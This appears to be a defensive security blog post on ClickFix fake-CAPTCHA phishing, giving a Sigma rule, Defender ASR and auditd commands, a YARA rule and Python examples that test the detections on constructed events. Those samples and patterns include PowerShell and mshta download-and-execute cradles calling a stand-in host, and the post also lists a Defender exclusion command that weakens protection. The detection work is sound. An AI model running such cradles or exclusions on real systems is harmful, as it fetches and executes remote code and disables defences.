Detection Alert: #ClickFix #FakeCaptcha | Sigma Rule


⚠️ #Phishing Just Got More Dangerous! Hackers are using FAKE CAPTCHA pop-ups to infect systems! This phishing technique (tracked as ClickFix) tricks users into running malware themselves through the Windows Run dialog, leading to credential theft, RAT infections, and full system compromise. It is being used to distribute Lumma Stealer, AsyncRAT, NetSupport RAT, and more.

How This Attack Works

1️⃣ A phishing email or malicious website delivers the trap.
2️⃣ A fake “I am not a robot” CAPTCHA appears.
3️⃣ Clicking the checkbox runs page JavaScript that silently copies a malicious command into your clipboard.
4️⃣ You are then told to press Windows + R, paste with Ctrl + V, and press Enter.
5️⃣ The pasted command abuses LOLBins (mshta.exe, powershell.exe) to fetch and execute remotely hosted malware.

Why Is This Dangerous?

🚫 Not a typical phishing attack: there is no attachment or download for a mail gateway to scan, because the victim types the payload in.

🚫 Directly executes remotely hosted code in memory, often without dropping a payload to disk.

How to Stay Safe?

✅ NEVER paste and run clipboard commands you did not write yourself; no legitimate CAPTCHA asks you to open the Run dialog.

✅ Restrict the Run dialog, mshta.exe and PowerShell for users who do not need them (GPO, ASR rules, AppLocker/WDAC).

✅ Report & block suspicious sites ASAP.

You Should Know:

Detecting & Mitigating Fake CAPTCHA Attacks

  • Sigma Rule Detection:

    title: Fake CAPTCHA Clipboard Injection via Run Dialog
    description: Detects mshta.exe or a hidden, profile-less PowerShell command launched from the Run dialog with a command pasted from the clipboard
    logsource:
        product: windows
        service: security
    detection:
        selection:
            EventID: 4688
            CommandLine|contains:
                - 'mshta.exe'
                - 'powershell -nop -w hidden -c '
        condition: selection

    Sigma string matching is case-insensitive, so POWERSHELL -NoP -W Hidden -C also fires. Two things a practitioner must check before relying on this rule: Security event 4688 only carries the command line when "Include command line in process creation events" is enabled (Computer Configuration > Administrative Templates > System > Audit Process Creation); without it the CommandLine field is empty and the rule can never match. If you collect Sysmon instead, the same selection works on Event ID 1 (logsource category: process_creation). Commands run from Win+R are children of explorer.exe, so the parent process is a useful extra field for confidence.

  • Blocking LOLBin Abuse:

    # Enable the ASR rule "Block execution of potentially obfuscated scripts" (5BEB7EFE-FD9A-4556-801D-275E5FFC04CC).
    # It does not block mshta.exe or powershell.exe outright; it blocks obfuscated script content, which catches many pasted ClickFix cradles.
    # Add-MpPreference appends to the configured rule list; Set-MpPreference would replace every ASR rule already set.
    Add-MpPreference -AttackSurfaceReductionRules_Ids "5BEB7EFE-FD9A-4556-801D-275E5FFC04CC" -AttackSurfaceReductionRules_Actions Enabled

    Roll the rule out with -AttackSurfaceReductionRules_Actions AuditMode first and review the Defender event log before switching it to Enabled.
    
    • Monitor Clipboard Execution:

      # Linux (auditd rule): log every execution of the xclip CLI under the key clipboard_monitor
      auditctl -a always,exit -F arch=b64 -S execve -F path=/usr/bin/xclip -k clipboard_monitor

      Review hits with ausearch -k clipboard_monitor. To persist the rule across reboots, put the same line (without the leading auditctl) in a file under /etc/audit/rules.d/. Note what this does and does not cover: it watches only the xclip binary, it does not see clipboard writes made by a browser, and the Windows Run-dialog chain above is not visible to auditd at all.
      
      • Windows Defender ASR Exclusion (this weakens ASR rather than tightening it; use it only for a known-good path that an enabled rule is blocking):
        powershell -Command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions 'C:\trusted\path\'"
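The Sigma selection from the Detecting & Mitigating section, run over a handful of constructed 4688 events so the matching semantics (case-insensitive wildcards, AND across fields, OR within a list) and the command-line-auditing caveat are visible. This is an added example, not code from the original post or its author; the events, the fake-captcha.example host and the explorer.exe parent refinement are assumptions for illustration:

```python
"""Run the page's Sigma selection over a few process-creation events.

Added example; this is not code from the original post or its author. The
events below are constructed, the host names are hypothetical (.example TLD),
and the explorer.exe parent check is an added refinement that the page's rule
does not include."""
import fnmatch

# The page's Sigma selection: EventID 4688 AND CommandLine matching any pattern.
# A list of values for one field is an OR in Sigma; '*' is a wildcard.
SIGMA_SELECTION = {
    "EventID": 4688,
    "CommandLine": ["*mshta.exe*", "*powershell -nop -w hidden -c *"],
}

# Constructed sample events (not real telemetry). Field names follow Security
# event 4688: NewProcessName, CommandLine, ParentProcessName (Creator Process Name).
SAMPLE_EVENTS = [
    {"id": 1, "EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://fake-captcha.example/verify.hta",
     "ParentProcessName": r"C:\Windows\explorer.exe"},
    {"id": 2, "EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('https://fake-captcha.example/p.ps1')\"",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe"},
    {"id": 3, "EventID": 4688,  # legitimate admin script: no match
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
     "ParentProcessName": r"C:\Windows\System32\svchost.exe"},
    {"id": 4, "EventID": 4688,  # benign Run-dialog use: no match
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "\"C:\\Windows\\System32\\notepad.exe\"",
     "ParentProcessName": r"C:\Windows\explorer.exe"},
    {"id": 5, "EventID": 4688,  # same cradle, different letter case
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "POWERSHELL -NoP -W Hidden -C \"irm https://fake-captcha.example/a | iex\"",
     "ParentProcessName": r"C:\Windows\explorer.exe"},
    {"id": 6, "EventID": 4688,  # command-line auditing disabled: CommandLine is empty
     "NewProcessName": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "",
     "ParentProcessName": r"C:\Windows\explorer.exe"},
]


def sigma_value_matches(pattern, value):
    """Sigma string semantics: case-insensitive, '*' and '?' are wildcards."""
    return fnmatch.fnmatchcase(str(value).lower(), str(pattern).lower())


def selection_matches(selection, event):
    """Every field in the selection must match (AND); a list of values is OR."""
    for field, expected in selection.items():
        if field not in event:
            return False
        patterns = expected if isinstance(expected, list) else [expected]
        if not any(sigma_value_matches(p, event[field]) for p in patterns):
            return False
    return True


def launched_from_run_dialog(event):
    """Added refinement (not in the page's rule): Win+R commands are spawned by
    explorer.exe, so that parent raises confidence that this was a pasted command."""
    return event.get("ParentProcessName", "").lower().endswith("\\explorer.exe")


def detect(events, selection=SIGMA_SELECTION):
    """Return (event id, confidence) for each event the selection fires on."""
    hits = []
    for ev in events:
        if selection_matches(selection, ev):
            hits.append((ev["id"], "high" if launched_from_run_dialog(ev) else "medium"))
    return hits


def missed_with_empty_commandline(events, selection=SIGMA_SELECTION):
    """Ids of mshta/powershell launches the rule cannot see because the 4688
    record carries no command line (command-line auditing not enabled)."""
    return [ev["id"] for ev in events
            if ev.get("EventID") == 4688 and not ev.get("CommandLine")
            and ev.get("NewProcessName", "").lower().endswith(("\\mshta.exe", "\\powershell.exe"))
            and not selection_matches(selection, ev)]


if __name__ == "__main__":
    for event_id, confidence in detect(SAMPLE_EVENTS):
        print(f"ALERT event {event_id}: Fake CAPTCHA Clipboard Injection via Run Dialog ({confidence})")
    for event_id in missed_with_empty_commandline(SAMPLE_EVENTS):
        print(f"MISSED event {event_id}: enable command-line auditing for 4688")
```

Events 1, 2 and 5 fire; event 6 is the same mshta.exe launch with command-line auditing switched off, and the rule is blind to it, which is why enabling "Include command line in process creation events" (or collecting Sysmon Event ID 1) comes before deploying the rule.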
        


      What Undercode Say:

      Fake CAPTCHA attacks exploit human trust in security mechanisms. Defenders must:
      – Audit Run-dialog executions (Security EventID 4688 with command-line logging enabled, or Sysmon EventID 1; processes started from Win+R are children of explorer.exe).
      – Remove the Run dialog for users who do not need it via GPO (gpedit.msc: User Configuration > Administrative Templates > Start Menu and Taskbar > "Remove Run menu from Start Menu", which also disables Win+R).
      – Use YARA rules to detect malicious scripts in memory:

      rule Fake_CAPTCHA_PS {
          meta:
              description = "PowerShell download cradle commonly pasted by fake CAPTCHA (ClickFix) lures"
          strings:
              // ascii covers script files and command lines; wide covers the UTF-16LE copy in PowerShell process memory
              $s1 = "IEX (New-Object Net.WebClient).DownloadString" ascii wide nocase
          condition:
              any of them
      }
      

      – Linux hardening against similar attacks:

      # Remove the execute bit from the xclip CLI. This only stops the command-line tool; it does not change browser
      # clipboard access, and it is a blunt control that also breaks legitimate use of xclip.
      chmod -x /usr/bin/xclip
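To see what YARA's ascii, wide and nocase string modifiers change when the target is PowerShell process memory rather than a script on disk, here is a pure-Python emulation of the page's rule string run over three constructed buffers: a script file, a UTF-16LE buffer standing in for PowerShell memory, and a benign command. This is an added example, not code from the original post; it does not replace running YARA, and the buffers and the fake-captcha.example host are constructed.

```python
"""Emulate the page's YARA string match in pure Python to show what 'ascii',
'wide' and 'nocase' change when scanning PowerShell process memory.

Added example; not code from the original post, and not a replacement for
running YARA itself. The three buffers are constructed; the host name is
hypothetical (.example TLD)."""
import re

# The string from the page's Fake_CAPTCHA_PS rule.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString"

# Constructed buffers (not captured from a real host).
SCRIPT_FILE = (b'powershell -nop -w hidden -c "iex (New-Object Net.WebClient)'
               b".DownloadString('https://fake-captcha.example/p.ps1')\"")
# PowerShell keeps script text as UTF-16LE in memory, so the cradle appears 'wide'.
PS_MEMORY = ("$x = 1\n" + CRADLE +
             "('https://fake-captcha.example/p.ps1')").encode("utf-16-le")
BENIGN = b"Invoke-WebRequest -Uri https://example.org/ -OutFile report.html"


def scan(buf, needle=CRADLE, modifiers=("ascii", "wide", "nocase")):
    """Return sorted [(offset, encoding)] for every occurrence of needle in buf,
    honouring YARA-style modifiers: ascii = raw bytes, wide = UTF-16LE,
    nocase = ASCII case folding (which is what YARA's nocase does)."""
    variants = {}
    if "ascii" in modifiers:
        variants["ascii"] = needle.encode("ascii")
    if "wide" in modifiers:
        variants["wide"] = needle.encode("utf-16-le")
    flags = re.IGNORECASE if "nocase" in modifiers else 0
    hits = []
    for enc, pattern in variants.items():
        for m in re.finditer(re.escape(pattern), buf, flags):
            hits.append((m.start(), enc))
    return sorted(hits)


def rule_fires(buf, modifiers=("ascii", "wide", "nocase")):
    """Condition 'any of them' for a rule with this single string."""
    return bool(scan(buf, modifiers=modifiers))


if __name__ == "__main__":
    for name, buf in (("script file", SCRIPT_FILE), ("process memory", PS_MEMORY), ("benign", BENIGN)):
        print(f"{name:15} ascii wide nocase: {scan(buf)}   plain string: {scan(buf, modifiers=('ascii',))}")
```

With the bare string (YARA's default is ascii, case-sensitive) the lowercase iex in the script file and the UTF-16LE copy in process memory are both missed; adding wide and nocase catches both, and the benign Invoke-WebRequest buffer still does not match.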
      

      Expected Output:

      • Detection logs for mshta.exe/powershell.exe execution.
      • Blocked RAT payloads via ASR rules.
      • User awareness training on fake CAPTCHA scams.

      Stay vigilant—verify before you execute! 🔐


      Reported By: Swachchhanda Shrawan – Hackers Feeds
      Extra Hub: Undercode MoN
      Basic Verification: Pass ✅
